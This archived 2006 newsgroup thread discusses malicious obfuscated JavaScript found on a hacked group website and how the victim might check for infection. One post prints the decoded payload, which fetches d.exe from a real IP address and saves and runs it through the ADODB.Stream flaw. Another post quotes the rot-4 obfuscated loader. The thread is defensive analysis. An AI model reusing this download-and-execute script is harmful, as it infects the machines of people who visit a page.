Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Computing > Computer Security > Malicious javascript obfustication

Reply
Thread Tools

Malicious javascript obfustication

 
 
Ant
Guest
Posts: n/a
 
      10-28-2006
"Wong Yung" wrote:

> *Sigh* I couldn't get a nice simple evil guy could I?


Many of the malware writers today are funded by organized crime, and
the software is getting more sophisticated. It's not so much hackers
having fun anymore.

> BTW what is this other more obfusticated exploit that you found?


There are a couple of levels of encoded script which I won't go
through here, but eventually it boils down to this (some munging
again; [ ] replace < >, and ht_p replaces http) ...

[script language='jscript']
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','ht_p://66.36.241.243/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
[/script]

So here is another method of downloading "d.exe" from the same IP
address as before, then using the ADODB.Stream cross-domain exploit
to save the file as "tm.exe" and run it in the context of the local
machine. MS patched this particular vulnerability some time ago.


 
Reply With Quote
 
 
 
 
Sebastian Gottschalk
Guest
Posts: n/a
 
      10-28-2006
Ant wrote:

>> *Sigh* I couldn't get a nice simple evil guy could I?

>
> Many of the malware writers today are funded by organized crime, and
> the software is getting more sophisticated. It's not so much hackers
> having fun anymore.


Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
script that used its very own URL (retrieved by document.location) as a
part of the self-decryption - anyone who didn't care for the URL anymore
after 4 redirects (each with a new obfuscation) and didn't store it, had a
little problem.
At the end, the last obfuscation layer outputted a script in a broken way,
so it didn't work correctly. But one could still figure out what it did -
and among many classical IE "exploits" one could actually find two new
ones. Reported them to Microsoft quickly, and a patch was never issued.
Business as usual.

> So here is another method of downloading "d.exe" from the same IP
> address as before, then using the ADODB.Stream cross-domain exploit
> to save the file as "tm.exe" and run it in the context of the local
> machine. MS patched this particular vulnerability some time ago.


Not quite true. One can sometimes trigger to download new or old versions
of existing ActiveX controls (ignoring IE's settings), and then make such
exploits work again. Even aside from that, just invoking an ActiveX control
without any possibility to access its scripting, can have devasting side
effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
made Windows 2000 Server SP3 start the Telnet Server Service if installed.
 
Reply With Quote
 
 
 
 
Wong Yung
Guest
Posts: n/a
 
      10-28-2006

Sebastian Gottschalk wrote:
> Ant wrote:
>
> >> *Sigh* I couldn't get a nice simple evil guy could I?

> >
> > Many of the malware writers today are funded by organized crime, and
> > the software is getting more sophisticated. It's not so much hackers
> > having fun anymore.

>
> Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
> script that used its very own URL (retrieved by document.location) as a
> part of the self-decryption - anyone who didn't care for the URL anymore
> after 4 redirects (each with a new obfuscation) and didn't store it, had a
> little problem.
> At the end, the last obfuscation layer outputted a script in a broken way,
> so it didn't work correctly. But one could still figure out what it did -
> and among many classical IE "exploits" one could actually find two new
> ones. Reported them to Microsoft quickly, and a patch was never issued.
> Business as usual.
>
> > So here is another method of downloading "d.exe" from the same IP
> > address as before, then using the ADODB.Stream cross-domain exploit
> > to save the file as "tm.exe" and run it in the context of the local
> > machine. MS patched this particular vulnerability some time ago.

>
> Not quite true. One can sometimes trigger to download new or old versions
> of existing ActiveX controls (ignoring IE's settings), and then make such
> exploits work again. Even aside from that, just invoking an ActiveX control
> without any possibility to access its scripting, can have devasting side
> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
> made Windows 2000 Server SP3 start the Telnet Server Service if installed.


Now I'm getting scared...So how can I be sure there isn't any nasty
stuff on my computer as a result of this? I've run a full antivirus
check, a full antispyware check and a full anti-trojan check using
Trojan Hunter and these programs at least say I'm clean. I am fully
patched up (I always install the updates as soon as they become
available). And I've run netstat and it doesn't show any strange
internet connections and my firewall doesn't show any strange
connections though of course it could be piggying-back on another
program. *Sigh* Who'd thought that you'd get infected from your own
webpage.

 
Reply With Quote
 
Sebastian Gottschalk
Guest
Posts: n/a
 
      10-28-2006
Wong Yung wrote:

>> [ActiveX is dangerous to no end]

> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?


Comparing all relevant system binaries against a baseline set of checksums?

Anyway, you said you're using Safari or Links (eh... try Links2). Those
don't know anything about ActiveX - only IE is vulnerable. Maybe also
Mozilla with the ActiveX plugin intentionally installed, but even then
you've have to explicitly whitelist vulnerable controls in first place.

> I've run a full antivirus check, a full antispyware check and a full
> anti-trojan check using Trojan Hunter and these programs at least say I'm clean.


Which means exactly nothing.

> I am fully patched up (I always install the updates as soon as they become
> available).


Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
you're not running Windows Server 2003), this means about nothing.

> And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggying-back on another
> program.


As already mentioned: If you didn't use IE, there's no reason why you would
have any problem at all.

> *Sigh* Who'd thought that you'd get infected from your own webpage.


At least for IE, any user should think so: It's stated in the manual! [1]



[1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
Caching Protection. It describes how you can activate a totally incomplete
solution to an inherent design problem that makes cross-site-scripting
trivially possible, in conjunction with the default full trust in the
Windows Update website as the XSS target giving every website full access
to all security-critical functions of IE.
 
Reply With Quote
 
Wong Yung
Guest
Posts: n/a
 
      10-28-2006

Sebastian Gottschalk wrote:
> Wong Yung wrote:
>
> >> [ActiveX is dangerous to no end]

> > Now I'm getting scared...So how can I be sure there isn't any nasty
> > stuff on my computer as a result of this?

>
> Comparing all relevant system binaries against a baseline set of checksums?
>
> Anyway, you said you're using Safari or Links (eh... try Links2). Those
> don't know anything about ActiveX - only IE is vulnerable. Maybe also
> Mozilla with the ActiveX plugin intentionally installed, but even then
> you've have to explicitly whitelist vulnerable controls in first place.
>
> > I've run a full antivirus check, a full antispyware check and a full
> > anti-trojan check using Trojan Hunter and these programs at least say I'm clean.

>
> Which means exactly nothing.
>
> > I am fully patched up (I always install the updates as soon as they become
> > available).

>
> Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
> you're not running Windows Server 2003), this means about nothing.
>
> > And I've run netstat and it doesn't show any strange
> > internet connections and my firewall doesn't show any strange
> > connections though of course it could be piggying-back on another
> > program.

>
> As already mentioned: If you didn't use IE, there's no reason why you would
> have any problem at all.
>
> > *Sigh* Who'd thought that you'd get infected from your own webpage.

>
> At least for IE, any user should think so: It's stated in the manual! [1]
>
>
>
> [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
> Caching Protection. It describes how you can activate a totally incomplete
> solution to an inherent design problem that makes cross-site-scripting
> trivially possible, in conjunction with the default full trust in the
> Windows Update website as the XSS target giving every website full access
> to all security-critical functions of IE.


I use Linux at work but at home I have Windows XP. Usually I use
Firefox. However, as I was changing some things on my site I thought
that I should check that it works in IE as well (you know IE and
css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
the plague but I thought, hey it's my own homepage, should be safe.
Right? Unfortunately I had IE on the default Moderate Security setting
because I never use IE.

*Sigh*

 
Reply With Quote
 
Wong Yung
Guest
Posts: n/a
 
      10-28-2006

Wong Yung wrote:

>
> I use Linux at work but at home I have Windows XP. Usually I use
> Firefox. However, as I was changing some things on my site I thought
> that I should check that it works in IE as well (you know IE and
> css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
> the plague but I thought, hey it's my own homepage, should be safe.
> Right? Unfortunately I had IE on the default Moderate Security setting
> because I never use IE.
>
> *Sigh*


Oh yeah, I forgot to mention. I may use Linux at work but practically
everyone else uses Windows XP with IE. And of course they visit the
hacked webpage fairly regularly which is actually not really my
personal personal webpage but more like the webpage for the entire
group (when I talk about my homepage I'm talking about my personal page
in this larger group site) so they go there to say get the latest news
and whatnot. I do too but I usually do so at work in Linux or if I'm
at home using Windows using Firefox (the only time I used IE was for 2
minutes once to check whether the css was screwed up or not. Sadly
enough that may be all that was required to get myself hacked...).
Most of the other people at work go there in Windows using IE. So as
you can see, there is quite a lot of potential for trouble here...

 
Reply With Quote
 
Ant
Guest
Posts: n/a
 
      10-29-2006
"Wong Yung" wrote:

> Sebastian Gottschalk wrote:
>> Not quite true. One can sometimes trigger to download new or old versions
>> of existing ActiveX controls (ignoring IE's settings), and then make such
>> exploits work again. Even aside from that, just invoking an ActiveX control
>> without any possibility to access its scripting, can have devasting side
>> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
>> made Windows 2000 Server SP3 start the Telnet Server Service if installed.

>
> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?


You could start by looking for those files mentioned in the exploits
(u.exe, d.exe and tm.exe), although sometimes the malware will delete
the initial files once it's installed.

> I've run a full antivirus
> check, a full antispyware check and a full anti-trojan check using
> Trojan Hunter and these programs at least say I'm clean. I am fully
> patched up (I always install the updates as soon as they become
> available). And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggying-back on another
> program.


If there's no unusual activity you are probably ok, but unless you're
very familiar with your system the only sure way is to reformat the HD
and reinstall the OS.

There's now an 'ADODB.connection' vulnerability which has just been
discovered. See http://isc.sans.org/diary.php?storyid=1807

Next time you use IE on the Internet, be sure to disable ActiveX
completely.


 
Reply With Quote
 
Sebastian Gottschalk
Guest
Posts: n/a
 
      10-29-2006
Ant wrote:

> Next time you use IE on the Internet, be sure to disable ActiveX
> completely.


Doesn't matter. There ar various unpatched buffer overflows which can be
triggered without any ActiveX or Scripting. In any case, you're ****ed off.
 
Reply With Quote
 
Ant
Guest
Posts: n/a
 
      10-29-2006
"Sebastian Gottschalk" wrote:

> Ant wrote:
>> Next time you use IE on the Internet, be sure to disable ActiveX
>> completely.

>
> Doesn't matter. There ar various unpatched buffer overflows which can be
> triggered without any ActiveX or Scripting.


Well, that doesn't surprise me.

> In any case, you're ****ed off.


What do you mean by that? I'm quite content, thanks.


 
Reply With Quote
 
erewhon
Guest
Posts: n/a
 
      10-29-2006

>>
Quote:
>> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${m hxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o=' ';for(i=0;i<92;i++){o+=String.fromCharCode(s.charC odeAt(i)-4);}document.write(o);
>>
>>
>> Is there any tool I can use to work out what the URL is from this?

>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4


Can you explain the process/tools you use - I'm no code head but am
impressed by this type of work


 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Malicious JavaScript code, Noone Here Javascript 25 01-31-2006 01:50 AM
JavaScript and malicious code? Lew Computer Support 6 01-29-2006 04:54 AM
ActiveX apologetic Larry Seltzer... "Sun paid for malicious ActiveX code, and Firefox is bad, bad bad baad. please use ActiveX, it's secure and nice!" (ok, the last part is irony on my part) fernando.cassia@gmail.com Java 0 04-16-2005 10:05 PM
malicious javascript code Xah Lee Javascript 0 11-19-2004 10:08 AM
preventing malicious user input Stimp ASP .Net 1 09-15-2004 03:25 AM



Advertisments